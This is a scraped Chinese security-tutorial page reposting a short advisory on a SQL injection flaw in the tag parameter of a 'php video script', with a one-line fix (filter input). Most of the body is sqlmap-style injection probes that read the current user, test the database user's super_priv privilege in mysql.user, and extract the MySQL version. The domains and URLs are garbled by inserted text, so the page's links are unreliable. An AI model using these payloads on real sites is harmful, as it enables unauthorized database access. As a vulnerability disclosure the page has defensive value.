好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

php video script SQL注射缺陷及修复 - 网站安全 - 自学

 

标题: php video script SQL Injection Vulnerability

作者: longrifle0x HdhCmsTest2cto测试数据 HdhCmsTestsecurity-research.ge

下载 地址:http://HdhCmsTestalurian测试数据/php-video-script/

测试工具: SQLMAP

 

概述

 

在video_tags发现SQL injection.

 

*测试方法*

 

link: http://HdhCmsTest2cto测试数据 /tag <http://HdhCmsTest2cto测试数据 /tag>

 

vulnerability link: http://HdhCmsTest2cto测试数据 /tag <http://HdhCmsTest2cto测试数据 /tag>'

 

http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1

<http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1> [GET][id=-1][CURRENT_USER()

 

http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1[GET][id=-1][SELECT(CASE

<http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1[GET][id=-1][SELECT(CASE> WHEN

((SELECT super_priv FROM mysql .user WHERE user='None' LIMIT 0,1)='Y')

THEN 1 ELSE 0 END)

 

http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)

<http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)>

 

HdhCmsTest2cto测试数据修复

 

过滤上述页面的参数输入

查看更多关于php video script SQL注射缺陷及修复 - 网站安全 - 自学的详细内容...

  阅读:38次